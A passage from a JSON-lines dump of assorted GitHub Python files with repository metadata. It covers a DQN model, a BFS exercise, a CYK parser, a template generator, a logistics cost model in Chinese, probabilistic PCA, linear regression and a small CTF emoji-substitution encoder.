dtype=torch.float32), -1, 1)\n\n y = self.target_network.forward(next_state)\n # dim (batch_size, agents, number_actions)\n y = y.view(-1, self.agents, self.number_actions)\n # Get the maximum prediction for the next state from the target network\n max_target_net = y.max(-1)[0]\n # dim (batch_size, agents, number_actions)\n network_prediction = self.q_network.forward(curr_state).view(\n -1, self.agents, self.number_actions)\n isNotOver = (torch.ones(*terminal.shape) - terminal)\n # Bellman equation\n batch_labels_tensor = rewards + isNotOver * \\\n (discount_factor * max_target_net.detach())\n\n # td_errors = (network_prediction -\n # batch_labels_tensor.unsqueeze(-1)).detach() # TODO td error needed\n # for exp replay\n\n actions = torch.tensor(transitions[1], dtype=torch.long).unsqueeze(-1)\n y_pred = torch.gather(network_prediction, -1, actions).squeeze()\n\n # Update transitions' weights\n # self.buffer.recompute_weights(transitions, td_errors)\n\n return torch.nn.SmoothL1Loss()(\n batch_labels_tensor.flatten(), y_pred.flatten())\n","repo_name":"amiralansary/rl-medical","sub_path":"examples/LandmarkDetection/MultiAgent/DQNModel.py","file_name":"DQNModel.py","file_ext":"py","file_size_in_byte":16429,"program_lang":"python","lang":"en","doc_type":"code","stars":173,"dataset":"github-code","pt":"77"} +{"seq_id":"74211836088","text":"from collections import deque\nimport sys\n\nt = int(sys.stdin.readline())\n\ndef bfs(start, count):\n que = deque([start])\n visited[start] = True\n\n while que:\n if visited.count(True) == n:\n return count\n num = que.popleft()\n\n for i in graph[num]:\n if not visited[i]:\n que.append(i)\n count +=1\n visited[i] = True\n\nfor _ in range(t):\n n,m = map(int, sys.stdin.readline().rstrip().split())\n visited = [False] * (n+1)\n\n graph = [[] for _ in range(n+1)]\n\n for i in range(m):\n a,b = map(int, sys.stdin.readline().rstrip().split())\n graph[a].append(b)\n graph[b].append(a)\n\n p = bfs(1, 0)\n print(p)\n\n","repo_name":"hyunha95/algorithm-study","sub_path":"CSH/python/baekjoon/dfs&bfs/P9372_상근이의_여행.py","file_name":"P9372_상근이의_여행.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34000633569","text":"# =================== >>\r\n# PARSER\r\n# =================== >>\r\nimport itertools, sys\r\nfrom pycomp.lexer import run_lexer\r\nfrom pycomp.error import get_error\r\nfrom pycomp.cfg2cnf import grammar_to_list\r\nfrom pycomp.utils import stringify_line\r\n\r\ndef subs_grammar(union, production, grammar_list):\r\n '''\r\n I.S. union is defined, but maybe empty\r\n F.S. if rule is in list of grammar, and the rule is not in union, \r\n we add the rule to it.\r\n \r\n For instance, we have production (B, A) and there is a rule such that\r\n S -> BA and C -> BA in the form of ['S', 'B', 'A'] and ['C', 'B', 'A'].\r\n Furthermore, let us assume our union is empty, then \r\n from union = [] -> union = ['S', 'C'] because they produce BA. \r\n '''\r\n for grammar in grammar_list:\r\n if (grammar[0] not in union) and (production == tuple(grammar[1:])):\r\n union.append(grammar[0])\r\n\r\nclass Parser:\r\n def __init__(self, filename, cnf_file, text):\r\n self.filename = filename\r\n self.cnf_file = cnf_file\r\n self.text = text\r\n\r\n def parse_cyk(self, tokenized_line, cnf_grammar):\r\n line = [\"'\" + token.tag + \"'\" for token in tokenized_line]\r\n length = len(line)\r\n cyk_table = [[[] for _ in range(length)] for _ in range(length)]\r\n\r\n for i in range(length):\r\n for j in range(length - i):\r\n if (i == 0):\r\n for grammar in cnf_grammar:\r\n if (len(grammar) == 2) and (grammar[1] == line[j]):\r\n cyk_table[i][j].append(grammar[0])\r\n else:\r\n lprod = []\r\n x = 0; y = j + 1\r\n while (x != i):\r\n cartesian_prod = list(itertools.product(cyk_table[x][j], \r\n cyk_table[i - x - 1][y]))\r\n lprod.extend(cartesian_prod)\r\n x += 1; y += 1\r\n \r\n union = []\r\n for production in lprod:\r\n subs_grammar(union, production, cnf_grammar)\r\n cyk_table[i][j] = [var for var in set(union)]\r\n\r\n return (cyk_table[-1][0] != [])\r\n\r\n def parse_text(self):\r\n text_by_line, tokenized_lines = run_lexer(self.filename, self.text)\r\n cnf_grammar = grammar_to_list(self.cnf_file)\r\n\r\n if_count = 0\r\n ctr = 0\r\n for line in tokenized_lines:\r\n is_accepted = self.parse_cyk(line, cnf_grammar)\r\n line_stringified = stringify_line(line)\r\n \r\n # Handle if block\r\n if is_accepted:\r\n if 'IF' in line_stringified:\r\n if_count += 1\r\n elif ('ELSE' in line_stringified) and (if_count != 0):\r\n if_count -= 1\r\n elif ('ELIF' in line_stringified) and (if_count == 0):\r\n error = get_error('ELIF', line, f\"Expected an if statement\", text_by_line)\r\n error.print_error()\r\n sys.exit(1)\r\n elif ('ELSE' in line_stringified) and (if_count == 0):\r\n error = get_error('ELSE', line, f\"Expected an if statement\", text_by_line)\r\n error.print_error()\r\n sys.exit(1)\r\n else:\r\n initial_token = line[0]\r\n print(initial_token.pos_start)\r\n print(text_by_line[initial_token.pos_start.line - 1])\r\n print(\"\\033[91mSyntax Error Found!\\033[0m\")\r\n sys.exit(1)\r\n\r\n ctr += 1\r\n\r\ndef run_parser(filename, cnf_file, text):\r\n parser = Parser(filename, cnf_file, text)\r\n parser.parse_text()\r\n print(\"\\033[92mYay, your program is accepted!\\033[0m\")\r\n","repo_name":"khelli07/python-compiler","sub_path":"pycomp/cyk_parser.py","file_name":"cyk_parser.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26980389929","text":"import argparse\nimport os\nimport string\nimport shutil\nimport urllib.request\n\n\ndef parse_args(destination, name, type):\n print(\"destination:\", destination)\n print(\"name:\", name)\n print(\"type:\", type)\n\n\nparser = argparse.ArgumentParser(description=\"Used to generate various template files.\")\nparser.add_argument(\"-n\", \"--name\", help=\"target project name. eg: EPDomain_okr\", required=True)\nparser.add_argument(\"-t\", \"--type\", help=\"target project type\", choices=[\"domain\", \"app\", \"plugin\"], required=True)\nparser.add_argument(\"-d\", \"--destination\", help=\"target generated path\", default=r'..\\template_generate')\nargs = parser.parse_args()\n\n\ndef download_gitignore():\n url = \"https://www.toptal.com/developers/gitignore/api/c++,qt,qml\"\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/110.0.0.0 Safari/537.36',\n }\n\n request = urllib.request.Request(url, headers=headers)\n gitignore_text = urllib.request.urlopen(request).read()\n\n try:\n gitignore_file_path = os.path.join(args.destination, args.name, '.gitignore')\n with open(gitignore_file_path, 'w', encoding='utf-8') as gitignore_file:\n gitignore_file.write(gitignore_text.decode())\n gitignore_file.close()\n except IOError:\n shutil.rmtree(args.destination)\n exit(1)\n\n\nif __name__ == '__main__':\n try:\n parse_args(args.destination, args.name, args.type)\n except Exception as e:\n print(e)\n\n template_files_path = r'template\\{type}'.format(type=args.type)\n path_walk = os.walk(template_files_path)\n files = []\n for dirpath, dirnames, filenames in path_walk:\n for filename in filenames:\n filename = dirpath + '\\\\' + filename\n files.append(filename)\n\n for file in files:\n with open(file, 'r') as f:\n template = string.Template(f.read())\n f.close()\n\n file = file.replace(template_files_path, '')\n target_file_path = args.destination + '\\\\' + args.name + '\\\\' + file\n target_file_path_dirname = os.path.dirname(target_file_path)\n if not os.path.exists(target_file_path_dirname):\n os.makedirs(target_file_path_dirname)\n\n with open(os.path.realpath(target_file_path), 'x', encoding='utf-8') as f:\n f.write(template.safe_substitute(TM_TARGET_NAME=args.name))\n f.close()\n\n download_gitignore()\n","repo_name":"BitYhb/qsdf_core_master","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"1336412918","text":"import math\ndef makeItOne(N):\n # code here \n #print(int(N))\n count = 0\n l = [int(math.pow(2,x)) for x in range(int(math.log2(N)+1))]\n #print(l)\n\n while(N!=1):\n \tif N in l:\n \t\tcount+=l.index(N)\n \t\tN = 1\n \telse:\n \t\t#l = [x for x in l if x= flow) and (initial_truck_list[n][3] <= temp_cap) and (initial_truck_list[n][0] + initial_truck_list[n][1] + initial_truck_list[n][2] <= temp_truck_num)): #若该车辆组合装载量大于等于运量,且该组合装载量小于等于当前装载量,且该组合车辆数小于等于当前车辆数\n temp_cap = initial_truck_list[n][3]\n #更新当前装载量为该组合装载量\n temp_truck_num = initial_truck_list[n][0] + initial_truck_list[n][1] + initial_truck_list[n][2] #更新当前车辆数为该组合车辆数\n final_truck = initial_truck_list[n]\n #更新车辆使用为该组合\n\n return final_truck\n\n# 得出初始的输出表格\ndef link_route(hub_list):\n '''\n \n :param hub_list: 中心局清单\n :return: 车辆成本空表,包含列'收寄城市', '寄达城市', '车辆使用情况', '车辆成本'(只添加前两列)\n '''\n hub_list = list(hub_list['城市名称'])\n\n cost_detail = pd.DataFrame()\n for i in range(0, len(hub_list)):\n for j in range(0, len(hub_list)):\n start = hub_list[i]\n end = hub_list[j]\n truck = np.nan\n cost = 0\n cost_detail = cost_detail.append([[start, end, truck, cost]])\n cost_detail = pd.DataFrame(np.array(cost_detail), columns=['收寄城市', '寄达城市', '车辆使用情况', '车辆成本'])\n return cost_detail\n\n#尾量空载情况运输成本计算公式\ndef transport_1(final_truck_list,temp_distance,driver_num):\n '''\n \n :param final_truck_list: 车辆使用情况(满载,空载两个list)\n :param temp_distance: 路线之间的距离\n :param driver_num: 司机数\n :return: 单条线路运输成本\n '''\n # 计算成本\n truck_cost = temp_distance * ((final_truck_list[0][0] + final_truck_list[1][0]) * (pa.GL_DEP[2] + pa.GL_LQ[2] + pa.GL_OTHER[2]) + (final_truck_list[0][1] + final_truck_list[1][1]) * (pa.GL_DEP[1] + pa.GL_LQ[1] + pa.GL_OTHER[1])+ (final_truck_list[0][2] + final_truck_list[1][2]) * (pa.GL_DEP[0] + pa.GL_LQ[0] + pa.GL_OTHER[0])) + \\\n temp_distance * (final_truck_list[0][0] * pa.GL_OIL[2] + final_truck_list[0][1] * pa.GL_OIL[1] + final_truck_list[0][2] * pa.GL_OIL[0]) + \\\n temp_distance * (final_truck_list[1][0] * pa.GL_EMP_OIL[2] + final_truck_list[1][1] * pa.GL_EMP_OIL[1] +final_truck_list[1][2] * pa.GL_EMP_OIL[0]) + \\\n (round(temp_distance / pa.GL_V[2], 6) * driver_num * pa.GL_LABOR[2] * (final_truck_list[0][0] + final_truck_list[1][0])) + (round(temp_distance / pa.GL_V[1], 6) * driver_num * pa.GL_LABOR[1] * (final_truck_list[0][1] + final_truck_list[1][1])) + (round(temp_distance / pa.GL_V[0], 6) * driver_num * pa.GL_LABOR[0] * (final_truck_list[0][2] + final_truck_list[1][2]))\n #折旧+路桥+其他费用+\n #满载车油耗费用+\n #空载车油耗费用+\n #司机费用\n\n return truck_cost\n\n\n\n# 计算尾量空载情况车辆成本\ndef transport_cost_1(cost_detail, weight, distance):\n '''\n \n :param cost_detail: 初始化车辆成本表\n :param weight: 运量(重量)表\n :param distance: 距离表\n :return: 最终成本表(尾量空载)\n '''\n initial_truck_list = truck_list(pa.GL_MAX) #计算车辆组合清单\n\n for i in range(0, cost_detail.shape[0]): #循环初始化表中的每一行\n\n print(\"共{0}层,目前循环到{1}层!\".format(cost_detail.shape[0], i + 1))\n\n route_list = [[cost_detail.loc[i, \"收寄城市\"] , cost_detail.loc[i, \"寄达城市\"]],\n [cost_detail.loc[i, \"寄达城市\"] , cost_detail.loc[i, \"收寄城市\"]]]\n\n # 线路清单 [[起,终],[终,起]]\n flow = [0,0]\n full_truck_list = []\n empty_truck_list = [0, 0, 0, 0]\n\n for j in range(0, len(route_list)):\n\n flow[j] = weight.iloc[weight.loc[(weight['收寄城市'] == route_list[j][0]) & (weight['寄达城市'] == route_list[j][1])].index.tolist()[0], 2]\n # 查询该行起-终和终-起的运量(重量)并赋给flow\n full_truck_list.append(initial_truck(initial_truck_list,flow[j]))\n # 计算起-终和终-起的初始车辆使用情况\n if j == 1: #如果起-终和终-起的初始车辆使用情况均计算完毕\n if full_truck_list[j][3] >= full_truck_list[j - 1][3]:\n #如果起-终使用的车型组合载重更小,则进入下列循环进行车辆更新\n for m in range(0, full_truck_list[j][0] + 1):\n for n in range(0, full_truck_list[j][1] + 1):\n for p in range(0, full_truck_list[j][2] + 1):\n if (m * pa.GL_CAP[2] + n * pa.GL_CAP[1] + p * pa.GL_CAP[0]) >= flow[j-1]:\n full_truck_list[j - 1] = [m, n, p,m * pa.GL_CAP[2] + n * pa.GL_CAP[1] + p * pa.GL_CAP[0]]\n empty_truck_list = [full_truck_list[j][i] - full_truck_list[j - 1][i] for i in range(len(full_truck_list[j]))]\n empty_truck_list[3] = empty_truck_list[0] * pa.GL_CAP[2] + empty_truck_list[1] * pa.GL_CAP[1] + empty_truck_list[2] * pa.GL_CAP[0]\n break\n else:\n continue\n break\n else:\n continue\n break\n final_truck_list = [full_truck_list[j - 1], empty_truck_list]\n else:\n # 如果起-终使用的车型组合载重更大,则该条线路无需更新车辆使用情况\n final_truck_list = [full_truck_list[j - 1], [0, 0, 0, 0]]\n #计算成本\n temp_distance = distance.iloc[distance.loc[(distance['收寄城市'] == route_list[0][0]) & (distance['寄达城市'] == route_list[0][1])].index.tolist()[0], 2] # 查询距离\n driver_num = 2 if temp_distance >= pa.GL_DSP else 1 #司机数量\n truck_cost = transport_1(final_truck_list, temp_distance, driver_num)\n cost_detail.loc[i, \"车辆使用情况\"] = \"{0}-{1}的邮路使用{2}辆40t满载车,{3}辆20t满载车,{4}辆12t满载车以及{5}辆40t空载车,{6}辆20t空载车,{7}辆12t空载车\".format(cost_detail.iloc[i, 0], cost_detail.iloc[i, 1], final_truck_list[0][0], final_truck_list[0][1],final_truck_list[0][2], final_truck_list[1][0], final_truck_list[1][1], final_truck_list[1][2])\n cost_detail.loc[i, \"车辆成本\"] = truck_cost\n\n return cost_detail\n\n\n\n\n\n# 计算单条线路运输成本(尾量委办)\ndef transport_2(final_truck_list,temp_distance,driver_num):\n truck_cost_1= temp_distance * ((final_truck_list[0][0]) * (pa.GL_DEP[2] + pa.GL_LQ[2] + pa.GL_OTHER[2])+ (final_truck_list[0][1]) * (pa.GL_DEP[1] + pa.GL_LQ[1] + pa.GL_OTHER[1]) + (final_truck_list[0][2]) * (pa.GL_DEP[0] + pa.GL_LQ[0] + pa.GL_OTHER[0])) + \\\n temp_distance * (final_truck_list[0][0] * pa.GL_OIL[2] + final_truck_list[0][1] * pa.GL_OIL[1] + final_truck_list[0][2] *pa.GL_OIL[0]) + \\\n (temp_distance / pa.GL_V[2] * driver_num * pa.GL_LABOR[2] * final_truck_list[0][0]) + \\\n (temp_distance / pa.GL_V[1] * driver_num * pa.GL_LABOR[1] * final_truck_list[0][1]) + \\\n (temp_distance / pa.GL_V[0] * driver_num * pa.GL_LABOR[0] * final_truck_list[0][2])\n\n #自办邮路运输成本 = 折旧+路桥+其他费用+\n #油耗费用+\n #司机费用\n truck_cost_2 = temp_distance * ((final_truck_list[1][0]) * (pa.GL_DEP[2] + pa.GL_LQ[2] + pa.GL_OTHER[2]) * pa.GL_K[0]+ (final_truck_list[1][1]) * (pa.GL_DEP[1] + pa.GL_LQ[1] + pa.GL_OTHER[1]) * pa.GL_K[1]+ (final_truck_list[1][2]) * (pa.GL_DEP[0] + pa.GL_LQ[0] + pa.GL_OTHER[0]) * pa.GL_K[2]) + \\\n temp_distance * (final_truck_list[1][0] * pa.GL_OIL[2] * pa.GL_K[0] + final_truck_list[1][1] * pa.GL_OIL[1] * pa.GL_K[1] + final_truck_list[1][2] * pa.GL_OIL[0]) * pa.GL_K[2] + \\\n (temp_distance / pa.GL_V[2] * driver_num * pa.GL_LABOR[2] * final_truck_list[1][0] * pa.GL_K[0]) + \\\n (temp_distance / pa.GL_V[1] * driver_num * pa.GL_LABOR[1] * final_truck_list[1][1] * pa.GL_K[1]) + \\\n (temp_distance / pa.GL_V[0] * driver_num * pa.GL_LABOR[0] * final_truck_list[1][2] * pa.GL_K[2])\n #委办邮路运输成本 = 折旧+路桥+其他费用+\n #油耗费用+\n #司机费用(各类车型分别乘对应系数)\n truck_cost = truck_cost_1 + truck_cost_2\n return truck_cost\n\n# 计算车辆成本情况(尾量委办)\ndef transport_cost_2(cost_detail, weight, distance):\n '''\n\n :param cost_detail: 初始化车辆成本表\n :param weight: 运量(重量)表\n :param distance: 距离表\n :return: 最终成本表(尾量空载)\n '''\n initial_truck_list = truck_list(pa.GL_MAX) # 计算车辆组合清单\n for i in range(0, cost_detail.shape[0]): # 循环初始化表中的每一行\n\n print(\"共{0}层,目前循环到{1}层!\".format(cost_detail.shape[0], i + 1))\n\n route_list = [[cost_detail.loc[i, \"收寄城市\"], cost_detail.loc[i, \"寄达城市\"]],\n [cost_detail.loc[i, \"寄达城市\"], cost_detail.loc[i, \"收寄城市\"]]]\n # 线路清单 [[起,终],[终,起]]\n flow = [0,0]\n ziban_truck_list = []\n weiban_truck_list = [0, 0, 0, 0]\n for j in range(0, len(route_list)):\n flow[j] = weight.iloc[weight.loc[(weight['收寄城市'] == route_list[j][0]) & (weight['寄达城市'] == route_list[j][1])].index.tolist()[0], 2]\n # 查询该行起-终和终-起的运量(重量)并赋给flow\n ziban_truck_list.append(initial_truck(initial_truck_list, flow[j]))\n # 计算起-终和终-起的初始车辆使用情况\n if j == 1:\n if ziban_truck_list[j][3] <= ziban_truck_list[j - 1][3]:\n for m in range(0, ziban_truck_list[j-1][0] + 1):\n for n in range(0, ziban_truck_list[j-1][1] + 1):\n for p in range(0, ziban_truck_list[j-1][2] + 1):\n if m * pa.GL_CAP[2] + n * pa.GL_CAP[1] + p * pa.GL_CAP[0] >= flow[j]:\n ziban_truck_list[j] = [m, n, p,m * pa.GL_CAP[2] + n * pa.GL_CAP[1] + p * pa.GL_CAP[0]]\n weiban_truck_list = [ziban_truck_list[j-1][i] - ziban_truck_list[j][i] for i in range(len(ziban_truck_list[j-1]))]\n weiban_truck_list[3] = weiban_truck_list[0] * pa.GL_CAP[2] + weiban_truck_list[1] * pa.GL_CAP[1] + weiban_truck_list[2] * pa.GL_CAP[0]\n break\n else:\n continue\n break\n else:\n continue\n break\n final_truck_list = [ziban_truck_list[j], weiban_truck_list]\n else:\n\n for m in range(0, ziban_truck_list[j][0] + 1):\n for n in range(0, ziban_truck_list[j][1] + 1):\n for p in range(0, ziban_truck_list[j][2] + 1):\n if m * pa.GL_CAP[2] + n * pa.GL_CAP[1] + p * pa.GL_CAP[0] >= flow[j-1]:\n ziban_truck_list[j-1] = [m, n, p,m * pa.GL_CAP[2] + n * pa.GL_CAP[1] + p * pa.GL_CAP[0]]\n break\n else:\n continue\n break\n else:\n continue\n break\n final_truck_list = [ziban_truck_list[j-1], [0, 0, 0, 0]]\n\n # 计算成本\n\n temp_distance = distance.iloc[distance.loc[(distance['收寄城市'] == route_list[0][0]) & (distance['寄达城市'] == route_list[0][1])].index.tolist()[0], 2] #查询距离\n driver_num = 2 if temp_distance >= 400 else 1 #司机数量\n truck_cost = transport_2(final_truck_list, temp_distance, driver_num) #计算单条线路运输成本\n cost_detail.loc[i, \"车辆使用情况\"] = \"{0}-{1}的邮路使用{2}辆40t自办车,{3}辆20t自办车,{4}辆12t自办车以及{5}辆40t委办车,{6}辆20t委办车,{7}辆12t委办车\".format(cost_detail.iloc[i, 0], cost_detail.iloc[i, 1], final_truck_list[0][0], final_truck_list[0][1],final_truck_list[0][2], final_truck_list[1][0], final_truck_list[1][1], final_truck_list[1][2])\n cost_detail.loc[i, \"车辆成本\"] = truck_cost\n return cost_detail\n\n\n\ndef compare_transport_cost(cost_detail_1,cost_detail_2):\n cost_detail_final = pd.merge(cost_detail_1,cost_detail_2,how = 'outer',on = ['收寄城市','寄达城市']) #全连接\n for i in range(0,cost_detail_final.shape[0]):\n print(i)\n temp_cost_detail_1 = cost_detail_final[cost_detail_final.收寄城市 == cost_detail_final.loc[i,'寄达城市'] ]\n temp_cost_detail = temp_cost_detail_1[temp_cost_detail_1.寄达城市 == cost_detail_final.loc[i,'收寄城市']]\n\n temp_cost_detail.reset_index(inplace = True)\n\n temp_cost_x = temp_cost_detail.loc[0, '车辆成本_x']\n temp_cost_y = temp_cost_detail.loc[0, '车辆成本_y']\n\n\n if (cost_detail_final.loc[i,'车辆成本_x'] + temp_cost_x ) < (cost_detail_final.loc[i,'车辆成本_y']+temp_cost_y ):\n\n cost_detail_final['车辆使用情况'] = cost_detail_final.loc[i, '车辆使用情况_x']\n cost_detail_final['车辆成本'] = cost_detail_final.loc[i, '车辆成本_x']\n else:\n\n cost_detail_final['车辆使用情况'] = cost_detail_final.loc[i, '车辆使用情况_y']\n cost_detail_final['车辆成本'] = cost_detail_final.loc[i, '车辆成本_y']\n cost_detail_final.drop(columns = ['车辆使用情况_x','车辆成本_x','车辆使用情况_y','车辆成本_y'],inplace = True)\n\n return cost_detail_final\n\n\n\n\n#处理成本计算\ndef handle_cost(chuliliang_big,chuliliang_jibao):\n cost_handle = pd.merge(chuliliang_big,chuliliang_jibao,how = 'outer', on = ['中心局'])\n cost_handle.replace(np.nan,0,inplace = True)\n cost_handle['处理成本'] = cost_handle.apply(lambda x: (pa.GL_HANDLEC[0]*x.大件处理量 + pa.GL_HANDLEC[1]*x.集包件处理量),axis = 1 )\n\n cost_handle.drop(columns = ['大件处理量','集包件处理量'],inplace = True)\n\n return cost_handle","repo_name":"henghengandxinye/JiBaoChuanxing","sub_path":"Procedure_1.py","file_name":"Procedure_1.py","file_ext":"py","file_size_in_byte":18466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33297290095","text":"from random import randint, choice\n\n# Task 1\nnumbers = [randint(-20, 20) for i in range(10)]\nprint(numbers)\nprint(len(numbers))\nprint(numbers[-1])\nprint(numbers[::-1])\n\nif 5 in numbers and 17 in numbers:\n print('YES')\nelse:\n print('NO')\n\nprint(numbers[1:-1])\n\n# Task 2\ntext = input().lower()\ntext = ' ' + text + ' '\nprint(text.count(' a ') + text.count(' an ') + text.count(' the '))\n\n# Task 3\nnegative = []\npositive = []\nzero = []\nwhile True:\n num = input()\n if num == '':\n res = negative + zero + positive\n break\n\n num = int(num)\n if num < 0:\n negative.append(num)\n elif num == 0:\n zero.append(num)\n else:\n positive.append(num)\n\nfor num in res:\n print(num)\n\n# Task 4\nticket = []\ndropped = []\nnumbers = list(range(1, 50))\n\nwhile len(ticket) < 6:\n num = randint(1, 49)\n if num not in ticket:\n ticket.append(num)\n\nfor i in range(6):\n dropped.append(choice(numbers))\n numbers.remove(dropped[-1])\n\ndropped.sort()\nticket.sort()\nprint(dropped)\nprint(ticket)\n\nif dropped == ticket:\n print('win')\nelse:\n print('lose')\n","repo_name":"kuzminprog/python-school77","sub_path":"module02/solution/topic03_05.py","file_name":"topic03_05.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42462276047","text":"import pickle\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow_probability import edward2 as ed\nimport matplotlib.pyplot as plt\nplt.style.use(\"ggplot\")\n\nfrom PPCA import probabilistic_pca, replace_latents\n\nD = 2\nK = 1\nN = 1000\nsigma = 0.5\n\nwith open(\"generate.pkl\", \"rb\") as f:\n x_train, w_true, z_true = pickle.load(f)\n\n##########################################################\n\n# returns the joint distribution, i.e. a function with original\n# parameters + parameters for all random variables which appear\n# during the PP\nlog_joint = ed.make_log_joint_fn(probabilistic_pca)\n\ndef posterior_unnormalized(w, z):\n return log_joint(\n D=D,\n K=K,\n N=N,\n sigma=sigma,\n w=w,\n z=z,\n x=x_train)\n\nw = tf.Variable(np.ones([D, K]), dtype=tf.float32)\nz = tf.Variable(np.ones([K, N]), dtype=tf.float32)\n\nobjective = -posterior_unnormalized(w, z)\n\n##########################################################\n\noptimizer = tf.train.AdamOptimizer(learning_rate=0.05)\ntrain = optimizer.minimize(objective)\n\ninit = tf.global_variables_initializer()\nobjective_vals = []\n\nwith tf.Session() as sess:\n sess.run(init)\n\n for k in range(200):\n _, objective_val = sess.run([train, objective])\n objective_vals.append(objective_val)\n if k % 10 == 0:\n print(\"iter {}, objective = {}\".format(k, objective_val))\n\n w_map, z_map = sess.run([w, z])\n\nprint(\"\")\nprint(\"True principal axes:\")\nprint(w_true)\n\nprint(\"\")\nprint(\"MAP-estimated principal axes:\")\nprint(w_map)\n\nplt.plot(objective_vals)\nplt.show()\n\n\n\nwith ed.interception(replace_latents(w_map, z_map)):\n generate = probabilistic_pca(D=D, K=K, N=N, sigma=sigma)\n\nwith tf.Session() as sess:\n x_generated, dummy_w, dummy_z = sess.run(generate)\n\nplt.scatter(x_train[0, :], x_train[1, :], color='blue', alpha=0.1, label='Actual data')\nplt.scatter(x_generated[0, :], x_generated[1, :], color='red', alpha=0.1, label='Simulated data (MAP)')\nplt.legend()\nplt.axis([-20, 20, -20, 20])\nplt.show()\n","repo_name":"cambridge-mlg/demo_PPCA_pyro_edward2","sub_path":"tensorflow_probability/MAP.py","file_name":"MAP.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"38164678252","text":"import random\n\nemojis = [n for n in \"🌸🍔🐳🚀🌞🎉🍦🎈🐶🍕🌺🎸⚡️🦋🌼🎁\"]\nm = open(\"text.txt\", \"rb\").read().hex()\n\nrandom.shuffle(emojis)\n\nfor e, c in zip(emojis, \"0123456789abcdef\"):\n m = m.replace(c, e)\n\nopen(\"out.txt\", \"w\").write(m)\n","repo_name":"sajjadium/ctf-archives","sub_path":"ctfs/ImaginaryCTF/2023/crypto/emoticons/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":490,"dataset":"github-code","pt":"77"} +{"seq_id":"42553101323","text":"import InterparkCrawling as ic\nimport pandas as pd\n\ninfo = pd.read_csv(\"/data/musical_crawling_info/musical_info_ay.csv\",\n encoding=\"utf-8-sig\")\n\nname = info[\"Musical\"]\ncode = info[\"Code\"]\nth = info[\"Th\"]\n\n\nfor i in range(len(name)):\n print(code[i], name[i], th[i])\n ic.IPCrawling(str(code[i]), str(name[i]), str(th[i]))\n\n\"\"\"\nIPCrawling에서 기대평으로 들어간다면?\nelem = driver.find_element(By.XPATH, \"/html/body/div[1]/div[5]/div[1]/div[2]/div[2]/nav/div/div/ul/li[4]/a\")\nli[4]를 li[3]으로 수정할 것\n\"\"\"\n","repo_name":"seoyeon83/MLDA_Final-Project_Team1","sub_path":"code/review_crawling/crawling_ay.py","file_name":"crawling_ay.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73607264567","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 2 14:21:31 2021\n\n@author: Mac\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n#import le dataset\ndataset= pd.read_csv('50_Startups.csv')\nX=dataset.iloc[:,:-1].values\ny=dataset.iloc[:,4].values\n#Encoding Categorical data les X\nfrom sklearn.preprocessing import LabelEncoder,OneHotEncoder\nfrom sklearn.compose import ColumnTransformer\nLabelencoder_X=LabelEncoder()\nX[:,3]=Labelencoder_X.fit_transform(X[:,3])\nct = ColumnTransformer([(\"State\", OneHotEncoder(), [3])], remainder = 'passthrough')\nX = ct.fit_transform(X)\n\n#Spliting the dataset into training dataset and test dataset\nX=X[:,1:]\nfrom sklearn.model_selection import train_test_split\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2,random_state=0)\n\n#You don't need to sacle your data the library take care \n\nfrom sklearn.linear_model import LinearRegression\nregressor=LinearRegression()\nregressor.fit(X_train,y_train)\nerror= regressor.score(X_train, y_train)\nprint('coefficient of determination:',error)\nprint('intercept:a', regressor.intercept_)\nprint('slope:b', regressor.coef_)\n\ny_pred = regressor.predict(X_test)\n\n#Building a model using backward elimination \nimport statsmodels.api as sm\n#add b1X1 to oour model with x1=1 Step 1\nX = np.append(arr=np.ones((50,1)).astype(int),values=X,axis=1)\n#Step fit the full model with all possible predictors\nX_opt = X[:,[0,1,2,3,4,5]]\nX_opt = np.array(X_opt, dtype=float) \nregressor_OLS = sm.OLS(endog =y ,exog =X_opt).fit()\nprint(regressor_OLS.summary())\nX_opt = X[:,[0,1,3,4,5]]\nX_opt = np.array(X_opt, dtype=float) \nregressor_OLS = sm.OLS(endog =y ,exog =X_opt).fit()\nprint(regressor_OLS.summary())\n\nX_opt = X[:,[0,3,4,5]]\nX_opt = np.array(X_opt, dtype=float) \nregressor_OLS = sm.OLS(endog =y ,exog =X_opt).fit()\nprint(regressor_OLS.summary())\n\n\nX_opt = X[:,[0,3,5]]\nX_opt = np.array(X_opt, dtype=float) \nregressor_OLS = sm.OLS(endog =y ,exog =X_opt).fit()\nprint(regressor_OLS.summary())\n\nX_opt = X[:,[0,3]]\nX_opt = np.array(X_opt, dtype=float) \nregressor_OLS = sm.OLS(endog =y ,exog =X_opt).fit()\nprint(regressor_OLS.summary())\n","repo_name":"haidour18/Regression_ML_python","sub_path":"MultipleRegression.py","file_name":"MultipleRegression.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42064290664","text":"lst=[\n [10,11],\n [13,45],\n [50,15],\n [60,70]\n]\n# for sub in lst:\n# for num in sub:\n# if num>16:\n# print(num)\nflatter_lst=[]\nfor sub in lst:\n for num in sub:\n 